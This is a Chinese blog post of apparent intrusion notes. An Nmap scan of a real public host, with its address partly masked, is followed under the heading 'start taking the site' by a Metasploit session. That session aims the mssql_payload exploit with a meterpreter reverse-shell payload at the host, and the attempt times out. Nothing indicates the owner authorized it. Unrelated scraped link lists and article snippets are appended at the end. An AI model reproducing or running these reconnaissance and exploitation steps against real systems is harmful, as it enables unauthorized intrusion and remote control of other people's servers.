扫描一下

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间

NSE: Loaded 49 scripts for scanning.

Initiating Ping Scan at 09:36

Scanning 203.171.239.* [4 ports]

Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 09:36

Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed

Initiating SYN Stealth Scan at 09:36

Scanning 203.171.239.* [1000 ports]

Discovered open port 3389/tcp on 203.171.239.*

Discovered open port 80/tcp on 203.171.239.*

Discovered open port 3306/tcp on 203.171.239.*

Discovered open port 21/tcp on 203.171.239.*

Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)

Initiating Service scan at 09:36

Scanning 4 services on 203.171.239.*

Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 203.171.239.*

Retrying OS detection (try #2) against 203.171.239.*

Initiating Traceroute at 09:37

Completed Traceroute at 09:37, 0.06s elapsed

Initiating Parallel DNS resolution of 1 host. at 09:37

Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed

NSE: Script scanning 203.171.239.*.

NSE: Starting runlevel 1 (of 1) scan.

Initiating NSE at 09:37

Completed NSE at 09:37, 5.22s elapsed

NSE: Script Scanning completed.

Nmap scan report for 203.171.239.*

Host is up (0.043s latency).

Not shown: 994 filtered ports

PORT STATE SERVICE VERSION

21/tcp open ftp Microsoft ftpd

25/tcp closed smtp

80/tcp open http Microsoft IIS httpd

|_http-methods: No Allow or Public header in OPTIONS response (status code 400)

|_html-title: Site doesn't have a title (text/html).

110/tcp closed pop3

3306/tcp open mysql MySQL 5.1.32-community

| mysql-info: Protocol: 10

| Version: 5.1.32-community

| Thread ID: 30457

| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection

| Status: Autocommit

|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O

3389/tcp open microsoft-rdp Microsoft Terminal Service

Device type: general purpose|media device

Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)

Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Busy server or unknown class

Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)

HOP RTT ADDRESS

1 50.00 ms 203.171.239.*

Read data files from: D:\metasploit\Nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds

Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

开始拿站

Welcome to the Metasploit Web Console!

_ _

_ | | (_)_

____ ____| |_ ____ ___ ____ | | ___ _| |_

| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)

| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__

|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)

|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload

>> info windows/mssql/mssql_payload

Name: Microsoft SQL Server Payload Execution

Version: 9669

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

David Kennedy "ReL1K" <kennedyd013@gmail.com>

jduck <jduck@metasploit.com>

Available targets:

Id Name

-- ----

0 Automatic

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload information:

Description:

This module will execute an arbitrary payload on a Microsoft SQL

Server, using the Windows debug.com method for writing an executable

to disk and the xp_cmdshell stored procedure. File size restrictions

are avoided by incorporating the debug bypass method presented at

Defcon 17 by SecureState. Note that this module will leave a

metasploit payload in the Windows System32 directory which must be

manually deleted once the attack is completed.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402

http://www.osvdb.org/557

http://www.securityfocus.com/bid/1281

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209

http://www.osvdb.org/15757

http://www.securityfocus.com/bid/4797

http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload

>> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

>> set RHOST 203.171.239.*

RHOST => 203.171.239.*

>> set LHOST 172.16.2.101

LHOST => 172.16.2.101

>> exploit

[*] Started reverse handler on 172.16.2.101:4444

[-] Exploit failed: The connection timed out (203.171.239.*:1433).

[*] Exploit completed, but no session was created.

渗透杂记-2013-07-13 windows/mssql/mssql_payload的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  3. SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真正的大型项目中经受住了考验:.Net版SAP RFC适配器组件和SharePoint 2013修改AD ...

  4. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  5. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  6. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. 小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧 ...

  9. SAP ERP 6.0 EHP7 SR2(WINDOWS MSSQL版)安装说明

    原文 by 枫竹丹青 ⋅ 1.安装准备 1.1.版本说明 本文是描述在一个Windows虚拟机.SQL Server数据库环境下,安装SAP ERP 6.0 EHP7 SR2服务器,安装完成虚拟机文件 ...

随机推荐

  1. ORA-29275: partial multibyte character

    查询表报错 修改方式1 和字符集存储方式有关系 ,修改客户端和服务器的字符集存储方害死 修改方式2 修改表的字段由nvarchar2修改为varchar2

  2. const

     const int i = 20; int const i = 20; 这两个语句是完全相同的:const与int哪个写在前面都不影响语义. 所以: const int *p; int const ...

  3. 来杯Caffe——在ubuntu下安装Caffe框架并测试

    Caffe是一种深度学习框架...blablabla...... Caffe要在ubuntu下安装 1. 安装依赖 sudo apt-get install libatlas-base-dev sud ...

  4. PorterDuffXfermode的用法

    1.下面的Xfermode子类可以改变这种行为: AvoidXfermode  指定了一个颜色和容差,强制Paint避免在它上面绘图(或者只在它上面绘图). PixelXorXfermode  当覆盖 ...

  5. Fatal error: Call to undefined function curl_init()问题

    最近分别在win7和Win8.win10 上分别安装php 高版本!都遇到了这个问题! 一.win7系统, apache2.2/apache2.4, php5.2升级到5.4. 这个比较容易: 1. ...

  6. JDK的安装与配置以及eclipse的使用

    一,需要软件: jdk 和eclipse 二,JDK和eclipse的下载 JDK下载地址:http://www.oracle.com/technetwork/java/javase/download ...

  7. 对点餐APP现阶段开发的问题

    团队的成立,基本是一气呵成.但是,github团队的建立却成为 第一个难题,大家对github都不熟,又刚刚好没课时间的任务,大家 已经各有安排,造成时间上的紧急.没有按时.按要求完成github的 ...

  8. Linux系统安装

    http://soft.chinabyte.com/os/447/12439447.shtml     磁盘分区 http://www.huaweigold.com/doc/ServerDOC-201 ...

  9. H5新特性 input type=date 在手机上默认提示显示无效解决办法

    目前PC端对input 的date类型支持不好,我试下来的结果是只有chrome支持.firefox.IE11 都不支持.而且PC端有很多日历控件可供使用.就不去多考虑这点了. 那么在移动端的话,io ...

  10. poj 2251 Dungeon Master

    http://poj.org/problem?id=2251 Dungeon Master Time Limit: 1000MS   Memory Limit: 65536K Total Submis ...